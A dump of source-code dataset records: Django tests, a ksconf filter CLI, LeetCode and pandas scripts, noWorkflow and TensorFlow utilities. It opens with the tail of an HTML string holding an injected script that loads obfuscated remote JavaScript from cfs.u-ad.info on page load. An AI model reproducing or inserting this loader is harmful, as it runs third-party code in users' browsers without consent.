<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.u-ad.info/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "¶ms=" + "4TtHaUQnUEiP6K%2fc5C582AaN6h071sG%2bJBYpJxd3JQSJs5mE8iAmw8USIyYDWcoVFc08gzCE8COQRBhCpHI1yC7skRDV9qYyHsdUIk2Qeh5fEPTGf2w%2fAexeHwBBM3qJNrfxOqlDLyX3udt7TqoNReDfIBn%2brVy%2bXEPB%2b8EBADsI1Ky5R%2bmMT%2bW5f4GztEj2O1tiud%2fhA1eRZDOA8mmhJtYMcL69A3eIK5GA8GaovnIqpEW%2fPvjHtnKIurfETIYf5ayMxYzYN1lED6XS%2fAb6PcLJr28pYQzmnhFa2BHbEg%2fIb0A3%2f%2fYokQpvFnkvQ2zFr6zcNU%2fELwAzWrxpSfHdjc3rc78s27Iqzcz57H00Dc%2fRd92Mw%2bWRClG4%2byxeuot%2ftTqeWWP%2fTPr3cJfjysdCW%2bsf7hgbZmIcOA4Gl3LH5ARvUDlRwAz786LT4TDlM0MvS7YhQtdY8Vai4ZoPeSWwCWp76PIQqYPRApUAKtS66EuHlmVHgcIdtNFspNfcV3Ro5%2ftCVEqnASugmE87PJkncpxnP6cGCRbSwOA7JshwR8RDsEF69XUIk2tn%2fH1MBTJUaONMqI5Vb4Fnuk1G37GFI6Ne3Myq3qQ4SC2RcISIMse5oG55mTQe%2bFhZFcAw27fh" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
</html>''' | [
"nadzeri.munawar94@gmail.com"
] | nadzeri.munawar94@gmail.com |
38d0615979c2b6f9212e065f17ac55ac9e8a8d52 | 37b00ed96501afdac30c67a5d5535b9e18825ff0 | /posts/tests/test_views.py | 2fd774d538641a438d8549667fcba761aac7f4f1 | [] | no_license | Iki-oops/hw05_final | b7b117c8ca8fcb3b39a2a8b54d40b2cc0ee9fe79 | 9962f5b380ba43de21d86d4d46048643882ad875 | refs/heads/master | 2023-03-26T13:22:24.052420 | 2021-04-02T18:21:11 | 2021-04-02T18:21:11 | 347,539,772 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,335 | py | import shutil
import tempfile
from django.conf import settings
from django.core.files.uploadedfile import SimpleUploadedFile
from django.test import TestCase, Client
from django.urls import reverse
from django.contrib.auth import get_user_model
from django import forms
from django.urls import reverse
from posts.models import Group, Post, Follow
SMALL_GIF = (
b'\x47\x49\x46\x38\x39\x61\x02\x00'
b'\x01\x00\x80\x00\x00\x00\x00\x00'
b'\xFF\xFF\xFF\x21\xF9\x04\x00\x00'
b'\x00\x00\x00\x2C\x00\x00\x00\x00'
b'\x02\x00\x01\x00\x00\x02\x02\x0C'
b'\x0A\x00\x3B'
)
class PostPagesTest(TestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
settings.MEDIA_ROOT = tempfile.mkdtemp(dir=settings.BASE_DIR)
cls.user = get_user_model().objects.create_user(username='YaBobyor')
cls.group = Group.objects.create(
title='Тест',
slug='test',
description='Домашние тесты',
)
cls.uploaded = SimpleUploadedFile(
name='small.gif',
content=SMALL_GIF,
content_type='image/gif'
)
cls.post = Post.objects.create(
text='ya bobyor',
author=cls.user,
group=cls.group,
image=cls.uploaded,
)
@classmethod
def tearDownClass(cls):
shutil.rmtree(settings.MEDIA_ROOT, ignore_errors=True)
super().tearDownClass()
def setUp(self):
self.guest_client = Client()
self.user = get_user_model().objects.create_user(username='YaBobr')
self.authorized_client = Client()
self.authorized_client.force_login(self.user)
def test_pages_uses_correct_template(self):
template_pages_name = {
'index.html': reverse('index'),
'group.html': reverse('group_posts',
args=[PostPagesTest.group.slug]),
'new_post.html': reverse('new_post'),
'profile.html': reverse('profile', args=[PostPagesTest.user])
}
for template, reverse_name in template_pages_name.items():
with self.subTest(reverse_name=reverse_name):
response = self.authorized_client.get(reverse_name)
self.assertTemplateUsed(response, template)
def test_index_list_show_correct_context(self):
response = self.authorized_client.get(reverse('index'))
get_page = response.context.get('page')[0]
post_text_0 = get_page.text
post_author_0 = get_page.author
post_group_0 = get_page.group
post_image_0 = get_page.image
self.assertEquals(post_text_0, 'ya bobyor')
self.assertEquals(post_author_0, PostPagesTest.user)
self.assertEquals(post_group_0, PostPagesTest.group)
self.assertTrue(post_image_0, PostPagesTest.uploaded)
def test_post_view_show_correct_context(self):
username = PostPagesTest.user.username
post_id = PostPagesTest.post.id
response = self.authorized_client.get(
reverse('post', args=[username, post_id]))
get_post = response.context.get('post')
post_image = get_post.image
self.assertTrue(post_image, PostPagesTest.uploaded)
def test_new_post_show_correct_context(self):
response = self.authorized_client.get(reverse('new_post'))
form_fields = {
'group': forms.fields.ChoiceField,
'text': forms.fields.CharField,
}
for value, excepted in form_fields.items():
with self.subTest(value=value):
form_field = response.context.get('form').fields.get(value)
self.assertIsInstance(form_field, excepted)
def test_group_posts_page_show_correct_context(self):
response = self.authorized_client.get(
reverse('group_posts', args=[PostPagesTest.group.slug]))
get_group = response.context.get('group')
get_post = response.context.get('page')[0]
post_image = get_post.image
group_title = get_group.title
group_slug = get_group.slug
group_description = get_group.description
self.assertEquals(group_title, 'Тест')
self.assertEquals(group_slug, 'test')
self.assertEquals(group_description, 'Домашние тесты')
self.assertTrue(post_image, PostPagesTest.uploaded)
def test_profile_list_show_correct_context(self):
response = self.authorized_client.get(
reverse('profile', args=[PostPagesTest.user]))
get_page = response.context.get('page')[0]
profile_text_0 = get_page.text
profile_author_0 = get_page.author
profile_group_0 = get_page.group
profile_image_0 = get_page.image
self.assertEquals(profile_text_0, 'ya bobyor')
self.assertEquals(profile_author_0, PostPagesTest.user)
self.assertEquals(profile_group_0, PostPagesTest.group)
self.assertTrue(profile_image_0, PostPagesTest.uploaded)
def test_created_post_in_index(self):
response = self.authorized_client.get(reverse('index'))
post = PostPagesTest.post.group
self.assertEquals(post, response.context.get('page')[0].group)
def test_created_post_in_selected_group(self):
response = self.authorized_client.get(
reverse('group_posts', args=[PostPagesTest.group.slug]))
post = PostPagesTest.post.group
self.assertEquals(post, response.context.get('page')[0].group)
# Тесты системы подписок
def test_check_profile_follow(self):
self.authorized_client.get(
reverse('profile_follow', args=[PostPagesTest.user]))
profile_response = self.authorized_client.get(
reverse('profile', args=[PostPagesTest.user]))
following = profile_response.context.get('following')
follow = Follow.objects.get(user=self.user, author=PostPagesTest.user)
self.assertTrue(following, follow)
def test_check_profile_unfollow(self):
self.authorized_client.get(
reverse('profile_follow', args=[PostPagesTest.user]))
self.authorized_client.get(
reverse('profile_unfollow', args=[PostPagesTest.user]))
profile_response = self.authorized_client.get(
reverse('profile', args=[PostPagesTest.user]))
following = profile_response.context.get('following')
self.assertFalse(following)
def test_following_post_in_follower_menu(self):
another_user = get_user_model().objects.create_user(username='Ya')
self.authorized_client.get(
reverse('profile_follow', args=[PostPagesTest.user]))
follow_index_response = self.authorized_client.get(
reverse('follow_index'))
posts = Post.objects.get(author=PostPagesTest.user)
other_posts = Post.objects.create(
author=another_user, text='test', group=PostPagesTest.group)
follow_posts = follow_index_response.context.get('page')[0]
self.assertEquals(follow_posts, posts)
self.assertNotEquals(follow_posts, other_posts)
class PaginatorViewsTest(TestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
Group.objects.create(
title='Тест',
slug='test',
description='Домашние тесты',
)
cls.group = Group.objects.get(slug='test')
cls.user = get_user_model().objects.create_user(username='Ya')
for i in range(13):
Post.objects.create(
text='Ya',
author=cls.user,
group=cls.group,
)
def setUp(self):
self.guest_client = Client()
self.authorized_client = Client()
self.authorized_client.force_login(PaginatorViewsTest.user)
def test_first_page_containse_ten_records(self):
response = self.authorized_client.get(reverse('index'))
get_page = response.context.get('page').object_list
self.assertEquals(len(get_page), 10)
def test_second_page_containse_three_records(self):
response = self.authorized_client.get(reverse('index') + '?page=2')
get_page = response.context.get('page').object_list
self.assertEquals(len(get_page), 3)
| [
"bambagaevdmitrij@gmail.com"
] | bambagaevdmitrij@gmail.com |
7663da85496ea77c6a7e9bcf0370b46364ca7856 | 936f5d7ba1e1282af705c746fb814973fe11102f | /ksconf/commands/filter.py | a415c1e40b37d211d66c0ff75b5d0b0ef8e290f4 | [
"Apache-2.0"
] | permissive | Splunk-App-and-TA-development/ksconf | 53199617ef92440ef8bcde4f9b9a12db7e0e9221 | 6a7e1a56f59ced76b9c95f48359bc7a6052183ed | refs/heads/master | 2023-01-10T12:31:40.993763 | 2020-11-04T14:53:46 | 2020-11-04T14:53:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,841 | py | """ SUBCOMMAND: ksconf filter <CONF>
Usage example:
ksconf filter default/savedsearches.conf --stanza "My Special Search" -o my-special-search.conf
Future things to support:
* SED-like rewriting for stanza name or key values.
* Mini eval/query language for simple data manipulations supporting mixed used of matching modes
on a case-by-base basis, custom logic (AND,OR,arbitrary groups), projections, and content
rewriting. (Should leverage custom 'combine' mini-language where possible.)
"""
from __future__ import absolute_import, unicode_literals
import argparse
import sys
from ksconf.commands import KsconfCmd, dedent, ConfFileType
from ksconf.conf.parser import PARSECONF_MID_NC, write_conf_stream
from ksconf.consts import EXIT_CODE_SUCCESS
from ksconf.filter import FilteredList, FilterListWildcard, create_filtered_list
from ksconf.util.completers import conf_files_completer
class FilterCmd(KsconfCmd):
help = "A stanza-aware GREP tool for conf files"
description = dedent("""
Filter the contents of a conf file in various ways. Stanzas can be included
or excluded based on a provided filter or based on the presence or value of a key.
Where possible, this command supports GREP-like arguments to bring a familiar feel.
""")
# format = "manual"
maturity = "alpha"
def __init__(self, *args, **kwargs):
super(FilterCmd, self).__init__(*args, **kwargs)
self.stanza_filters = None
self.attr_presence_filters = None
def register_args(self, parser):
# type: (argparse.ArgumentParser) -> None
parser.add_argument("conf", metavar="CONF", help="Input conf file", nargs="+",
type=ConfFileType("r", parse_profile=PARSECONF_MID_NC)
).completer = conf_files_completer
parser.add_argument("-o", "--output", metavar="FILE",
type=argparse.FileType('w'), default=self.stdout,
help="File where the filtered results are written. "
"Defaults to standard out.")
parser.add_argument("--comments", "-C",
action="store_true", default=False,
help="Preserve comments. Comments are discarded by default.")
parser.add_argument("--verbose", action="store_true", default=False,
help="Enable additional output.")
parser.add_argument("--match", "-m", # metavar="MODE",
choices=["regex", "wildcard", "string"],
default="wildcard",
help=dedent("""\
Specify pattern matching mode.
Defaults to 'wildcard' allowing for ``*`` and ``?`` matching.
Use 'regex' for more power but watch out for shell escaping.
Use 'string' to enable literal matching."""))
parser.add_argument("--ignore-case", "-i", action="store_true",
help=dedent("""\
Ignore case when comparing or matching strings.
By default matches are case-sensitive."""))
parser.add_argument("--invert-match", "-v", action="store_true",
help=dedent("""\
Invert match results.
This can be used to show what content does NOT match,
or make a backup copy of excluded content."""))
pg_out = parser.add_argument_group("Output mode", dedent("""\
Select an alternate output mode.
If any of the following options are used, the stanza output is not shown.
"""))
pg_out.add_argument("--files-with-matches", "-l", action="store_true",
help="List files that match the given search criteria")
pg_om1 = pg_out.add_mutually_exclusive_group()
pg_om1.add_argument("--count", "-c", action="store_true",
help="Count matching stanzas")
pg_om1.add_argument("--brief", "-b", action="store_true",
help="List name of matching stanzas")
pg_sel = parser.add_argument_group("Stanza selection", dedent("""\
Include or exclude entire stanzas using these filter options.
All filter options can be provided multiple times.
If you have a long list of filters, they can be saved in a file and referenced using
the special ``file://`` prefix. One entry per line."""))
pg_sel.add_argument("--stanza", metavar="PATTERN", action="append", default=[],
help=dedent("""
Match any stanza who's name matches the given pattern.
PATTERN supports bulk patterns via the ``file://`` prefix."""))
pg_sel.add_argument("--attr-present", metavar="ATTR", action="append", default=[],
help=dedent("""\
Match any stanza that includes the ATTR attribute.
ATTR supports bulk attribute patterns via the ``file://`` prefix."""))
'''# Add next
pg_sel.add_argument("--attr-eq", metavar=("ATTR", "PATTERN"), nargs=2, action="append",
default=[],
help="""
Match any stanza that includes an attribute matching the pattern.
PATTERN supports the special ``file://filename`` syntax.""")
'''
''' # This will be more difficult
pg_sel.add_argument("--attr-ne", metavar=("ATTR", "PATTERN"), nargs=2, action="append",
default=[],
help="""
Match any stanza that includes an attribute matching the pattern.
PATTERN supports the special ``file://`` syntax.""")
'''
pg_con = parser.add_argument_group("Attribute selection", dedent("""\
Include or exclude attributes passed through.
By default, all attributes are preserved.
Allowlist (keep) operations are preformed before blocklist (reject) operations."""))
pg_con.add_argument("--keep-attrs", metavar="WC-ATTR", default=[], action="append",
help=dedent("""\
Select which attribute(s) will be preserved.
This space separated list of attributes indicates what to preserve.
Supports wildcards."""))
pg_con.add_argument("--reject-attrs", metavar="WC-ATTR", default=[], action="append",
help=dedent("""\
Select which attribute(s) will be discarded.
This space separated list of attributes indicates what to discard.
Supports wildcards."""))
def prep_filters(self, args):
flags = 0
if args.ignore_case:
flags |= FilteredList.IGNORECASE
if args.verbose:
flags |= FilteredList.VERBOSE
self.stanza_filters = create_filtered_list(args.match, flags).feedall(args.stanza)
self.attr_presence_filters = create_filtered_list(args.match, flags)
self.attr_presence_filters.feedall(args.attr_present)
if args.keep_attrs or args.reject_attrs:
self.attrs_keep_filter = FilterListWildcard(flags)
for attrs in args.keep_attrs:
self.attrs_keep_filter.feedall(attrs.split(" "))
self.attrs_reject_filter = FilterListWildcard(FilteredList.INVERT | flags)
for attrs in args.reject_attrs:
self.attrs_reject_filter.feedall(attrs.split(" "))
else:
# Bypass filter
self.filter_attrs = lambda x: x
def _test_stanza(self, stanza, attributes):
if self.stanza_filters.match(stanza):
# If there are no attribute level filters, automatically keep (preserves empty stanzas)
if not self.attr_presence_filters.has_rules:
return True
# See if any of the attributes we are looking for exist, if so keep the entire stanza
for attr in attributes:
if self.attr_presence_filters.match(attr):
return True
return False
def filter_attrs(self, content):
d = {}
for (attr, value) in content.items():
if self.attrs_keep_filter.match(attr) and self.attrs_reject_filter.match(attr):
d[attr] = content[attr]
return d
def output(self, args, matches, filename):
if args.files_with_matches:
if matches:
if args.count:
args.output.write("{} has {} matching stanza(s)\n".format(filename, len(matches)))
elif args.brief:
for stanza_name in matches:
args.output.write("{}: {}\n".format(filename, stanza_name))
else:
# Just show a single file
args.output.write("{}\n".format(filename))
elif args.verbose:
self.stderr.write("No matching stanzas in {}\n".format(filename))
elif args.count:
args.output.write("{}\n".format(len(matches)))
elif args.brief:
for stanza_name in matches:
args.output.write("{}\n".format(stanza_name))
else:
if len(args.conf) > 1:
args.output.write("# {}\n".format(filename))
if matches:
write_conf_stream(args.output, matches)
elif args.verbose:
self.stderr.write("No matching stanzas in {}\n".format(filename))
if args.verbose:
sys.stderr.write("Matched {} stanzas from {}\n".format(len(matches), filename))
def run(self, args):
''' Filter configuration files. '''
self.prep_filters(args)
# By allowing multiple input CONF files, this means that we could have duplicate stanzas (not detected by the parser)
# so for now that just means duplicate stanzas on the output, but that may be problematic
# I guess this is really up to the invoker to know if they care about that or not... Still would be helpful for a quick "grep" of a large number of files
for conf in args.conf:
conf.set_parser_option(keep_comments=args.comments)
cfg = conf.data
# Should this be an ordered dict?
cfg_out = dict()
for stanza_name, attributes in cfg.items():
keep = self._test_stanza(stanza_name, attributes) ^ args.invert_match
if keep:
cfg_out[stanza_name] = self.filter_attrs(attributes)
self.output(args, cfg_out, conf.name)
# Explicit flush used to resolve a CLI unittest timing issue in pypy
args.output.flush()
return EXIT_CODE_SUCCESS
| [
"lowell@kintyre.co"
] | lowell@kintyre.co |
738caa12cbe1616e2d305dc41021a1cf74c290ad | 6d50ee04db4c75ebd5f0ca59780c6b093f6d2860 | /leetCode-remove-duplicate-letters.py | b0022b3ca04d71f2c32d1bc353b2b1fe517fa829 | [] | no_license | toontong/leetCode | bcdb42aa5a4c4dd54c2dfa5e6ea175add52f9ab9 | 28a69fff382c580a2f062c1e2c2577eed20d785c | refs/heads/master | 2021-01-10T01:55:49.340774 | 2016-01-18T07:59:12 | 2016-01-18T07:59:12 | 49,860,291 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 761 | py | class Solution(object):
def removeDuplicateLetters(self, s):
"""
:type s: str
:rtype: str
"""
r = []
m = {}
for i in range(len(s)):
c= s[i]
for j in range(i+1, len(s)):
if c == s[j]:
if r and c in m and c not in r:
r.append(c)
else:
m[c] = True
break
else:
if c not in r:r.append(c)
return ''.join(r)
def assertR(s, r):
rr = Solution().removeDuplicateLetters(s)
assert rr == r,(s,rr,r)
assertR("ccacbaba", "acb")
assertR("bbcaac", "bac")
assertR("bcabc", "abc")
assertR("cbacdcbc", "acdb")
| [
"chuantong.huang@gmail.com"
] | chuantong.huang@gmail.com |
100dc312e0f57dc4f71b1e521b5415281621a075 | 8efb83504f25c45dcdd23ac1649a42501fddd5e6 | /heat_map_processing/district_mapping.py | 1fae08e43404527d06a42bf64340f97f752e9df2 | [
"MIT"
] | permissive | ameliadogan/Philly-Police-Data | a5041dfdbeb7eac1d8666d69c1f65b13a6be0aee | 24608c39651830928b1f0019c4afad82c2cc8884 | refs/heads/master | 2021-04-18T05:14:18.266769 | 2020-09-17T16:48:15 | 2020-09-17T16:48:15 | 249,507,786 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,432 | py | import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
import re, datetime
import matplotlib.pyplot as plt
csv1= 'policedata/ppd_complaints.csv'
csv2 = 'policedata/ppd_complainant_demographics.csv'
csv3 = 'policedata/ppd_complaint_disciplines.csv'
csv4 = 'policedata/Boundaries_District.csv'
##preparing csvs into data frames
#complaint data
df_complaints = pd.read_csv(csv1)
#boundaries_district
df_police = pd.read_csv(csv4)
#drop police districts 23, Other Jurisdiction, and 4 that do not appear in current police district
df_complaints = df_complaints[df_complaints['district_occurrence'] != "400"]
df_complaints = df_complaints[df_complaints['district_occurrence'] != "2300"]
df_complaints = df_complaints[df_complaints['district_occurrence'] != "Other Jurisdiction"]
df_complaints = df_complaints.dropna()
df_complaints['district_occurrence'][df_complaints['district_occurrence'] == "9"] = "900" #have lone case of 9 put into district "900"
df_complaints['district_occurrence'] = pd.to_numeric(df_complaints['district_occurrence'])
#clean to get district names without "00" at e d
df_complaints['district_occurrence']= df_complaints['district_occurrence'] / 100
#make value count into dataframe
val_count = df_complaints['district_occurrence'].value_counts()
df_heat_map = val_count.rename_axis('DISTRICT_').reset_index(name='counts')
#export dataframe to dsv
df_heat_map.to_csv('heat_map_data.csv')
| [
"ameliadogan@gmail.com"
] | ameliadogan@gmail.com |
ed531ac39f4e836f0ef9223d8913f55327376982 | 8c825730f6fd253e58902b150a9800de8f766943 | /capture/noworkflow/now/cmd/cmd_history.py | 2e5d8da0a5ca9eab5b4e964956f6cef37e97c90f | [
"MIT"
] | permissive | rmparanhos/noworkflow | aeb92695c34e65edf9cc4d4dc31d80467b085773 | 8f703a14503345568e91957659b43654036f8154 | refs/heads/master | 2020-05-17T12:39:04.231204 | 2019-06-21T03:42:49 | 2019-06-21T03:42:49 | 183,716,529 | 0 | 0 | null | 2019-04-27T01:58:31 | 2019-04-27T01:58:31 | null | UTF-8 | Python | false | false | 1,849 | py | # Copyright (c) 2016 Universidade Federal Fluminense (UFF)
# Copyright (c) 2016 Polytechnic Institute of New York University.
# This file is part of noWorkflow.
# Please, consult the license terms in the LICENSE file.
"""'now history' command"""
from __future__ import (absolute_import, print_function,
division, unicode_literals)
import os
from ..ipython.converter import create_ipynb
from ..persistence.models.history import History as HistoryModel
from ..persistence import persistence_config
from .command import NotebookCommand
class History(NotebookCommand):
"""Show project history"""
def add_arguments(self):
add_arg = self.add_argument
add_arg("-s", "--script", type=str, default="*",
help="show history of specific script")
add_arg("-e", "--status", type=str, default="*",
choices=["*", "finished", "unfinished", "backup"],
help="show only trials in a specific status")
add_arg("--dir", type=str,
help="set demo path. Default to CWD/demo<number>"
"where <number> is the demo identification")
def execute(self, args):
persistence_config.connect_existing(args.dir or os.getcwd())
history = HistoryModel(script=args.script, status=args.status)
print(history)
def execute_export(self, args):
code = ("%load_ext noworkflow\n"
"import noworkflow.now.ipython as nip\n"
"# <codecell>\n"
"history = nip.History()\n"
"# history.graph.width = 700\n"
"# history.graph.height = 300\n"
"# history.script = '*'\n"
"# history.status = '*'\n"
"# <codecell>\n"
"history")
create_ipynb("History.ipynb", code)
| [
"joaofelipenp@gmail.com"
] | joaofelipenp@gmail.com |
04747c7c8266e99f1a85acf17f1ae88fef5da79d | 03d68f032ab0e8cf269413d0309fc6d36281504f | /src/l2hmc/utils/tensorflow/history.py | d66fe35509b67f88da6d0b9dd0b405dac0889a21 | [
"Apache-2.0"
] | permissive | saforem2/l2hmc-qcd | 560026cd4d63f786247170a2b8641a7402b7e81e | 46ada488bc5c8b0a31be0bf23ea11b95b3b06767 | refs/heads/main | 2023-09-06T03:20:19.577196 | 2023-08-23T19:26:58 | 2023-08-23T19:26:58 | 176,870,361 | 57 | 8 | Apache-2.0 | 2023-08-23T18:56:02 | 2019-03-21T04:32:54 | Jupyter Notebook | UTF-8 | Python | false | false | 1,812 | py | """
tensorflow/history.py
Implements tfHistory, containing minor modifications from base History class.
"""
from __future__ import absolute_import, print_function, division, annotations
from typing import Any
import tensorflow as tf
import numpy as np
from l2hmc.utils.history import BaseHistory
class History(BaseHistory):
def update(self, metrics: dict) -> dict:
avgs = {}
era = metrics.get('era', 0)
for key, val in metrics.items():
avg = None
if isinstance(val, (float, int)):
avg = val
else:
if isinstance(val, dict):
for k, v in val.items():
key = f'{key}/{k}'
try:
avg = self._update(key=key, val=v)
# TODO: Figure out how to deal with exception
except tf.errors.InvalidArgumentError:
continue
else:
avg = self._update(key=key, val=val)
if avg is not None:
avgs[key] = avg
try:
self.era_metrics[str(era)][key].append(avg)
except KeyError:
self.era_metrics[str(era)][key] = [avg]
return avgs
def _update(self, key: str, val: Any) -> float:
if val is None:
raise ValueError(f'None encountered: {key}: {val}')
if isinstance(val, list):
val = np.array(val)
try:
self.history[key].append(val)
except KeyError:
self.history[key] = [val]
if isinstance(val, (float, int)):
return val
try:
return tf.reduce_mean(val)
except Exception:
return val
| [
"saforem2@gmail.com"
] | saforem2@gmail.com |
7dd5572eb2f7345c5c19117511b278a267f52dbb | 0cf7dd2c3c0b28b52f1273e8fe2ea0a87cacc6af | /calc_area_circum.py | 2bd6a681d10b6c96d0890ec76ce91d3e8c64ef23 | [] | no_license | EngrDevDom/Everyday-Coding-in-Python | 61b0e4fcbc6c7f399587deab2fa55763c9d519b5 | 93329ad485a25e7c6afa81d7229147044344736c | refs/heads/master | 2023-02-25T05:04:50.051111 | 2021-01-30T02:43:40 | 2021-01-30T02:43:40 | 274,971,215 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 95 | py | R = 7
PI = 3.141592654
print("The area is", R**2 * PI)
print("The circumference is", 2*R*PI)
| [
"60880034+EngrDevDom@users.noreply.github.com"
] | 60880034+EngrDevDom@users.noreply.github.com |
2978fb1c34d97eec4de27f3fc9df73995099d1c1 | b3ac70325aaa45150f3a8c772087555fcf5751fb | /Codecademy/writing_CSV_files.py | 692d98a5b34514a98231a36227286062af552a1c | [] | no_license | ShaunMadziva/Codecademy | c4b6ef3b8ffae5ed1c42fb9aad134590cb3969d9 | 852d99d417eb21991ebf25b3df8bd79b323920c6 | refs/heads/main | 2023-05-30T13:56:48.584103 | 2021-06-24T17:59:24 | 2021-06-24T17:59:24 | 380,010,007 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,678 | py | access_log = [
{'time': '08:39:37', 'limit': 844404, 'address': '1.227.124.181'},
{'time': '13:13:35', 'limit': 543871, 'address': '198.51.139.193'},
{'time': '19:40:45', 'limit': 3021, 'address': '172.1.254.208'},
{'time': '18:57:16', 'limit': 67031769, 'address': '172.58.247.219'},
{'time': '21:17:13', 'limit': 9083, 'address': '124.144.20.113'},
{'time': '23:34:17', 'limit': 65913, 'address': '203.236.149.220'},
{'time': '13:58:05', 'limit': 1541474, 'address': '192.52.206.76'},
{'time': '10:52:00', 'limit': 11465607, 'address': '104.47.149.93'},
{'time': '14:56:12', 'limit': 109, 'address': '192.31.185.7'},
{'time': '18:56:35', 'limit': 6207, 'address': '2.228.164.197'}
]
import csv
#write to a CSV file
with open("logger.csv", "w") as logger_csv: # open a ne csv file in write mode
fields = ['time', 'address', 'limit'] #define the headers of the csv file from the dict keys
log_writer = csv.DictWriter(logger_csv, fieldnames=fields) #instantiate our CSV writer object and pass two arguments
#we can start adding lines to the CSV file itself!
log_writer.writeheader() #writes all the fields passed to fieldnames as the (headers) first row in our file
for item in access_log: #iterate through our list of data.
log_writer.writerow(item) #We call output_writer.writerow() with the item dictionaries which writes each line to the CSV file.
#read the CSV file
with open("logger.csv", "r") as logger_csv:
read = logger_csv.read()
print(read)
| [
"noreply@github.com"
] | noreply@github.com |
654671700188a0cf97b551f4f3716dcebb0ade85 | 48832d27da16256ee62c364add45f21b968ee669 | /res/scripts/client/gui/wgnc/events.py | 7291b9a2e8cb59d82254603badc1df9740d57f17 | [] | no_license | webiumsk/WOT-0.9.15.1 | 0752d5bbd7c6fafdd7f714af939ae7bcf654faf7 | 17ca3550fef25e430534d079876a14fbbcccb9b4 | refs/heads/master | 2021-01-20T18:24:10.349144 | 2016-08-04T18:08:34 | 2016-08-04T18:08:34 | 64,955,694 | 0 | 0 | null | null | null | null | WINDOWS-1250 | Python | false | false | 957 | py | # 2016.08.04 19:53:34 Střední Evropa (letní čas)
# Embedded file name: scripts/client/gui/wgnc/events.py
import Event
class _WGNCEvents(object):
__slots__ = ('__eManager', 'onItemShowByDefault', 'onItemShowByAction', 'onItemUpdatedByAction', 'onProxyDataItemShowByDefault')
def __init__(self):
super(_WGNCEvents, self).__init__()
self.__eManager = Event.EventManager()
self.onItemShowByDefault = Event.Event(self.__eManager)
self.onItemShowByAction = Event.Event(self.__eManager)
self.onItemUpdatedByAction = Event.Event(self.__eManager)
self.onProxyDataItemShowByDefault = Event.Event(self.__eManager)
def clear(self):
self.__eManager.clear()
g_wgncEvents = _WGNCEvents()
# okay decompyling c:\Users\PC\wotsources\files\originals\res\scripts\client\gui\wgnc\events.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2016.08.04 19:53:34 Střední Evropa (letní čas)
| [
"info@webium.sk"
] | info@webium.sk |
0aeb6218a917a30db42b3a1d8ecf90be05825eea | 288c9f231021c529d9eb8da6ae55aed779a68fe1 | /manage.py | 1e73e2222a941404e1ccc2eb0c45a15b50ea1c7c | [] | no_license | eddir/DiscreteMath | 7571b1d5314c1d121bb0c79e6324ac88e84aaff4 | db8b80f93a77a37fa6b84b40793337cae8dd3c67 | refs/heads/main | 2023-02-02T14:38:43.815430 | 2020-12-14T06:49:14 | 2020-12-14T06:49:14 | 313,072,471 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 668 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'DiscreteMath.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"eddirworkmail@gmail.com"
] | eddirworkmail@gmail.com |
74aeddee7276ced1388155ecfd993003fe1085f4 | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /NhPYFqfQcFXWvdH8t_5.py | f7d2eb52db8c7a1424e591f89c82b393d52cea0d | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,614 | py | """
A positive integer multiplied times its inverse is always equal to 1:
`17*(1/17)==1`. Modular arithmetic has a similar inverse function, although,
for modulus `m`, we are confined to integers from 0 to m-1. The modular
multiplicative inverse of 3 modulus 5 is equal to 2 because `(3*2)%5==1`.
Another example: the modular inverse of 17 modulus 1000007 is equal to 58824
because `(17*58824)%1000007==1`. The modular inverse, if it exists, must
always be in the range 0 to m-1.
Create a function that has arguments integer `n` and modulus `m`. The function
will return the modular inverse of `n` mod `m`. If the modular inverse does
not exist, return `False`.
### Examples
mod_inv(2, 3) ➞ 2
mod_inv(12, 47) ➞ 4
mod_inv(11, 33) ➞ False
mod_inv(55, 678) ➞ 37
mod_inv(81, 3455) ➞ 2346
### Notes
* Some of the test cases have rather large integers, so if you attempt to do a brute force search of the entire modular field, you may not be successful due to the 12 second time limit imposed by the server. See **Resources** for a more efficient approach.
* The modular inverse of a number `n` modulus `m` exists only if `n` and `m` are coprime (i.e. they have no common factors other than 1).
* One practical use of modular inverse is in public-key cryptography like RSA where it can be used to determine the value of the private key.
"""
def egcd(j, k):
if j == 0:
return (k, 0, 1)
h, y, x = egcd(k%j,j)
return (h, x - (k//j) * y, y)
def mod_inv(j, m):
h, x, y = egcd(j, m)
if h != 1:
return False
return x%m
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
